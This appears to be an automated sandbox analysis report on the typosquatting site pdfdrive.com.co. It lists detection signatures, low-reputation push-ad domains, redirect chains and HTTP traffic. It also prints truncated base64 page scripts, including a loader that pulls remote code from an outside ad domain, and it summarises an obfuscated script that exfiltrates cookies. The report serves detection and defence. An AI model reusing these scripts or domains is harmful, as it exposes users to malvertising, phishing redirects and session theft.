Edit tour

Windows Analysis Report
http://pdfdrive.com.co

Overview

General Information

Sample URL:	http://pdfdrive.com.co
Analysis ID:	1587377
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious Javascript

AI detected suspicious URL

Performs DNS queries to domains with low reputation

Creates files inside the system directory

Deletes files inside the Windows folder

Detected suspicious crossdomain redirect

HTML page contains hidden javascript code

HTML page contains obfuscated script src

Classification

Process Tree

System is w11x64_office

chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2168,i,12160170854791446595,9191331600167954229,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2208 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 3572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pdfdrive.com.co" MD5: 290DF23002E9B52249B5549F0C668A86)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected suspicious Javascript

Source: 0.16.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://cu0dup0hubcc73dr63tg.controlrushprotocol.c... This script exhibits several high-risk behaviors that indicate potential malicious intent:1. Dynamic Code Execution: The script uses the `eval()` function to execute obfuscated code, which is a common technique used by malware to evade detection.2. Data Exfiltration: The script collects and sends user data (potentially including sensitive information like cookies or session identifiers) to external servers, which could be used for malicious purposes like identity theft or fraud.3. Redirects to Malicious/Suspicious Domains: The script manipulates the browser's history to redirect the user to potentially malicious or suspicious domains, which could lead to phishing attacks or further compromise.4. Obfuscated Code/URLs: The script uses heavy obfuscation techniques, making it difficult to analyze and understand the true intent of the code. This is a common tactic used by malicious actors to hide their activities.Overall, the combination of these high-risk behaviors, along with the lack of transparency and the suspicious nature of the code, indicates a high likelihood of malicious intent. This script should be considered a significant security risk and should be blocked or further investigated.

AI detected suspicious URL

Source: URL	Joe Sandbox AI: AI detected Brand spoofing attempt in URL: http://pdfdrive.com.co
Source: URL	Joe Sandbox AI: AI detected Typosquatting in URL: http://pdfdrive.com.co

Source: https://srv.eu.ptmnd.com/v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/cl

HTTP Parser: Base64 decoded: e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c

Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CglmdW5jdGlvbiBzZXRDb29raWUoY25hbWUsIGN2YWx1ZSwgZXhkYXlzKSB7CgkJdmFyIGQgPSBuZXcgRGF0ZSgpOwoJCWQuc2V0VGltZShkLmdldFRpbWUoKSArIChleGRheXMqMjQqNjAqNjAqMTAwMCkpOwoJCXZhciBleHBpcmVzID0gImV4cGlyZXM9IisgZC50b1VUQ1N0cmluZygpOwoJCW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgbG9hZEZvbnQgPSAodXJsKSA9PiB7dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCB1cmwsIHRydWUpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSAoKSA9PiB7IGlmICh4aHIucmVhZHlTdGF0ZSA9PSA0ICYmIHhoci5zdGF0dXMgPT0gMjAwKSB7Y2
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgICB2YXIgYWRkaXRpb25hbEpzQ29kZSA9ICJmdW5jdGlvbiBMb2FkTGFyYVB1c2goKXsgaWYgKHR5cGVvZiBMYXJhUHVzaCA9PT0gXCJmdW5jdGlvblwiKSB7bmV3IExhcmFQdXNoKEpTT04ucGFyc2UoYXRvYignZXlKbWFYSmxZbUZ6WlVOdmJtWnBaeUk2ZXlKd2NtOXFaV04wU1dRaU9pSn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CgkJCWlmKCBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgicHhfbGlnaHRfZGFya19vcHRpb24iKSA9PSAxICkgewoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNzcy1kYXJrLXRoZW1lIikucmVtb3ZlQXR0cmlidXRlKCJtZWRpYSIpOwoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImJ1dH
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKGQseixzKXtzLnNyYz0naHR0cHM6Ly8nK2QrJy80MDEvJyt6O3RyeXsoZG9jdW1lbnQuYm9keXx8ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50KS5hcHBlbmRDaGlsZChzKX1jYXRjaChlKXt9fSkoJ3Nob29yZGFpcmQuY29tJyw3ODQ5NTg1LGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgd2luZG93LmRhdGFMYXllciA9IHdpbmRvdy5kYXRhTGF5ZXIgfHwgW107CiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7CgogIGd0YWcoJ2NvbmZpZycsICdHLVBCTVdDV1gzQlcnKTsK
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwoidXNlIHN0cmljdCI7dmFyIF9jcmVhdGVDbGFzcz1mdW5jdGlvbigpe2Z1bmN0aW9uIGRlZmluZVByb3BlcnRpZXModGFyZ2V0LHByb3BzKXtmb3IodmFyIGk9MDtpPHByb3BzLmxlbmd0aDtpKyspe3ZhciBkZXNjcmlwdG9yPXByb3BzW2ldO2Rlc2NyaXB0b3IuZW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwooZnVuY3Rpb24oKSB7CiJ1c2Ugc3RyaWN0Ijt2YXIgcj0iZnVuY3Rpb24iPT10eXBlb2YgU3ltYm9sJiYic3ltYm9sIj09dHlwZW9mIFN5bWJvbC5pdGVyYXRvcj9mdW5jdGlvbihlKXtyZXR1cm4gdHlwZW9mIGV9OmZ1bmN0aW9uKGUpe3JldHVybiBlJiYiZnVuY3
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgdGV4dF8gPSB0cnVlOwkKCXZhciBhamF4dXJsID0gImh0dHBzOi8vcGRmZHJpdmUuY29tLmNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIjsKCXZhciB0ZXh0X3ZvdGFyID0gIlZvdGUiOwoJdmFyIHRleHRfdm90b3MgPSAiVm90ZXMiOwoJdmFyIHRleHRfbG
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBmdW5jdGlvbigpIHsoZnVuY3Rpb24oJCkgewoJCQkkKCIjc2VhcmNoQm94IGlucHV0W3R5cGU9dGV4dF0iKS5vZmYoImtleXVwIik7CgkJfSkoalF1ZXJ5KTt9KTs=
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CglmdW5jdGlvbiBzZXRDb29raWUoY25hbWUsIGN2YWx1ZSwgZXhkYXlzKSB7CgkJdmFyIGQgPSBuZXcgRGF0ZSgpOwoJCWQuc2V0VGltZShkLmdldFRpbWUoKSArIChleGRheXMqMjQqNjAqNjAqMTAwMCkpOwoJCXZhciBleHBpcmVzID0gImV4cGlyZXM9IisgZC50b1VUQ1N0cmluZygpOwoJCW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgbG9hZEZvbnQgPSAodXJsKSA9PiB7dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCB1cmwsIHRydWUpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSAoKSA9PiB7IGlmICh4aHIucmVhZHlTdGF0ZSA9PSA0ICYmIHhoci5zdGF0dXMgPT0gMjAwKSB7Y2
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgICB2YXIgYWRkaXRpb25hbEpzQ29kZSA9ICJmdW5jdGlvbiBMb2FkTGFyYVB1c2goKXsgaWYgKHR5cGVvZiBMYXJhUHVzaCA9PT0gXCJmdW5jdGlvblwiKSB7bmV3IExhcmFQdXNoKEpTT04ucGFyc2UoYXRvYignZXlKbWFYSmxZbUZ6WlVOdmJtWnBaeUk2ZXlKd2NtOXFaV04wU1dRaU9pSn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CgkJCWlmKCBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgicHhfbGlnaHRfZGFya19vcHRpb24iKSA9PSAxICkgewoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNzcy1kYXJrLXRoZW1lIikucmVtb3ZlQXR0cmlidXRlKCJtZWRpYSIpOwoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImJ1dH
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKGQseixzKXtzLnNyYz0naHR0cHM6Ly8nK2QrJy80MDEvJyt6O3RyeXsoZG9jdW1lbnQuYm9keXx8ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50KS5hcHBlbmRDaGlsZChzKX1jYXRjaChlKXt9fSkoJ3Nob29yZGFpcmQuY29tJyw3ODQ5NTg1LGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgd2luZG93LmRhdGFMYXllciA9IHdpbmRvdy5kYXRhTGF5ZXIgfHwgW107CiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7CgogIGd0YWcoJ2NvbmZpZycsICdHLVBCTVdDV1gzQlcnKTsK
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwoidXNlIHN0cmljdCI7dmFyIF9jcmVhdGVDbGFzcz1mdW5jdGlvbigpe2Z1bmN0aW9uIGRlZmluZVByb3BlcnRpZXModGFyZ2V0LHByb3BzKXtmb3IodmFyIGk9MDtpPHByb3BzLmxlbmd0aDtpKyspe3ZhciBkZXNjcmlwdG9yPXByb3BzW2ldO2Rlc2NyaXB0b3IuZW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwooZnVuY3Rpb24oKSB7CiJ1c2Ugc3RyaWN0Ijt2YXIgcj0iZnVuY3Rpb24iPT10eXBlb2YgU3ltYm9sJiYic3ltYm9sIj09dHlwZW9mIFN5bWJvbC5pdGVyYXRvcj9mdW5jdGlvbihlKXtyZXR1cm4gdHlwZW9mIGV9OmZ1bmN0aW9uKGUpe3JldHVybiBlJiYiZnVuY3
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgdGV4dF8gPSB0cnVlOwkKCXZhciBhamF4dXJsID0gImh0dHBzOi8vcGRmZHJpdmUuY29tLmNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIjsKCXZhciB0ZXh0X3ZvdGFyID0gIlZvdGUiOwoJdmFyIHRleHRfdm90b3MgPSAiVm90ZXMiOwoJdmFyIHRleHRfbG
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBmdW5jdGlvbigpIHsoZnVuY3Rpb24oJCkgewoJCQkkKCIjc2VhcmNoQm94IGlucHV0W3R5cGU9dGV4dF0iKS5vZmYoImtleXVwIik7CgkJfSkoalF1ZXJ5KTt9KTs=
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CglmdW5jdGlvbiBzZXRDb29raWUoY25hbWUsIGN2YWx1ZSwgZXhkYXlzKSB7CgkJdmFyIGQgPSBuZXcgRGF0ZSgpOwoJCWQuc2V0VGltZShkLmdldFRpbWUoKSArIChleGRheXMqMjQqNjAqNjAqMTAwMCkpOwoJCXZhciBleHBpcmVzID0gImV4cGlyZXM9IisgZC50b1VUQ1N0cmluZygpOwoJCW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgbG9hZEZvbnQgPSAodXJsKSA9PiB7dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCB1cmwsIHRydWUpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSAoKSA9PiB7IGlmICh4aHIucmVhZHlTdGF0ZSA9PSA0ICYmIHhoci5zdGF0dXMgPT0gMjAwKSB7Y2
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgICB2YXIgYWRkaXRpb25hbEpzQ29kZSA9ICJmdW5jdGlvbiBMb2FkTGFyYVB1c2goKXsgaWYgKHR5cGVvZiBMYXJhUHVzaCA9PT0gXCJmdW5jdGlvblwiKSB7bmV3IExhcmFQdXNoKEpTT04ucGFyc2UoYXRvYignZXlKbWFYSmxZbUZ6WlVOdmJtWnBaeUk2ZXlKd2NtOXFaV04wU1dRaU9pSn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CgkJCWlmKCBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgicHhfbGlnaHRfZGFya19vcHRpb24iKSA9PSAxICkgewoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNzcy1kYXJrLXRoZW1lIikucmVtb3ZlQXR0cmlidXRlKCJtZWRpYSIpOwoJCQkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImJ1dH
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKGQseixzKXtzLnNyYz0naHR0cHM6Ly8nK2QrJy80MDEvJyt6O3RyeXsoZG9jdW1lbnQuYm9keXx8ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50KS5hcHBlbmRDaGlsZChzKX1jYXRjaChlKXt9fSkoJ3Nob29yZGFpcmQuY29tJyw3ODQ5NTg1LGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,CiAgd2luZG93LmRhdGFMYXllciA9IHdpbmRvdy5kYXRhTGF5ZXIgfHwgW107CiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7CgogIGd0YWcoJ2NvbmZpZycsICdHLVBCTVdDV1gzQlcnKTsK
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwoidXNlIHN0cmljdCI7dmFyIF9jcmVhdGVDbGFzcz1mdW5jdGlvbigpe2Z1bmN0aW9uIGRlZmluZVByb3BlcnRpZXModGFyZ2V0LHByb3BzKXtmb3IodmFyIGk9MDtpPHByb3BzLmxlbmd0aDtpKyspe3ZhciBkZXNjcmlwdG9yPXByb3BzW2ldO2Rlc2NyaXB0b3IuZW
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwooZnVuY3Rpb24oKSB7CiJ1c2Ugc3RyaWN0Ijt2YXIgcj0iZnVuY3Rpb24iPT10eXBlb2YgU3ltYm9sJiYic3ltYm9sIj09dHlwZW9mIFN5bWJvbC5pdGVyYXRvcj9mdW5jdGlvbihlKXtyZXR1cm4gdHlwZW9mIGV9OmZ1bmN0aW9uKGUpe3JldHVybiBlJiYiZnVuY3
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgdGV4dF8gPSB0cnVlOwkKCXZhciBhamF4dXJsID0gImh0dHBzOi8vcGRmZHJpdmUuY29tLmNvL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIjsKCXZhciB0ZXh0X3ZvdGFyID0gIlZvdGUiOwoJdmFyIHRleHRfdm90b3MgPSAiVm90ZXMiOwoJdmFyIHRleHRfbG
Source: https://pdfdrive.com.co/	HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBmdW5jdGlvbigpIHsoZnVuY3Rpb24oJCkgewoJCQkkKCIjc2VhcmNoQm94IGlucHV0W3R5cGU9dGV4dF0iKS5vZmYoImtleXVwIik7CgkJfSkoalF1ZXJ5KTt9KTs=

Source: https://pdfdrive.com.co/	HTTP Parser: No favicon
Source: https://pdfdrive.com.co/	HTTP Parser: No favicon
Source: https://realpush.realsh.xyz/b2/l/c/redir?asid=3263414584SGiLPZHx&cid=5&did=RV1ST3s&eid=15328&n=f3f38a527a1ea99b2925c598&nid=10004&sid=maH16AVIvMiWF8nVqgoBWetUHKn0qeXN0D0vMNkKmpiqSGOaPrn6uIa88qdt6FQmro5CtGrTdE1Au4f3TUBBuk%2BoDw8BD%2Fmq5ByQ4ttTkIEZJbct48jGEXFqMfKq7%2BEswwytUeh%2FQ%2Fr9e42PtSg%2FpkjfiKcUk7GhOIgRYS3MAl6sFFkITyIUkF66cYEJQYvZ9JVO242IKPDCcEd7z7d9NQuMZ2n76g2sbSLqE6yMpyuGV%2BBmLKPl%2ByLfSAkAc5AQWuvrwMwmHOjymf9LWb8mo2%2BJdhy3Q11woi96q0fLIT5KwdgTkvnd%2F7PGgSwlNr3hkJfaO%2BAzDkbi09fiMEkfaB3k5vgMx1vBQJHD%2BCEJOlvauo6M6lQARnC7ZvArxHMMIZ7wgHsVxUb0%2FDY0DS%2F7amR8vD87W1WaHysq5iFWOp%2BRn3o%2BZEdxOQnVGS%2Fgqm4Di1BVUlqYrylQhK2lOuj64knKqeK77FuxIOj5Jx3XwTsuRS6avLcoRqaeVgB9kfnudiC%2FnioEq4hAI8OGBWgITJw8Agng6e7uMw9mqmY2DgEwd4MyT%2BhRTfBctOr12V50kJPqVkOB4%2FavFMi9fqPJaHA%2BwcMYz%2FhdhtHO%2FYJhDZ6LAJgKuuoBjQNwZL4L0UuCHML%2BwaithTZJw5LAjAzscXHNpFvbFGC5SyTgjXzb4XlOl600N%2F5yMl%2BuzJAAZobGTv7F%2Ba0YeSky%2F1j4kicLfs3Vp7pkEuKjbmdBzxrY%2By%2FBfEHmv3KxxuxN4cjqZbwjZfCTA%2FJUS5FwnfQBMSI2DxgBj%2FASb6Au1gg%2BsuZnREIJCk%2BtqGw9dS...	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49844 version: TLS 1.2

Networking

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: icon-adc.realsh.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: icon-adc.realsh.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: realpush.realsh.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: realpush.realsh.xyz

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: want-some-psh.net to https://open-2-view.com/index?cid=b795b5d29eff25c3bd93&extclickid=gb44nfzoz502coifrghoay74hoac4-2atnvyv6mc&cost=0.0416&t1=506894&t2=2851560&type=default&campaignid=888527&feedid=30&browser=chrome&agegroup=age_30_60&creativeid=2851560&creativebutton={creativebutton}

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 172.205.25.163
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 172.205.25.163
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.209.135
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.209.135
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.209.135
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.209.135
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.158.192
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.158.192
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveOrigin: https://pdfdrive.com.cosec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uploads/enable_notifications.png HTTP/1.1Host: cdn.larapush.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uploads/enable_notifications_mobile.gif HTTP/1.1Host: cdn.larapush.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1Host: fleraprt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async_log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1Host: fleraprt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/ic HTTP/1.1Host: icon.eu.ptmnd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
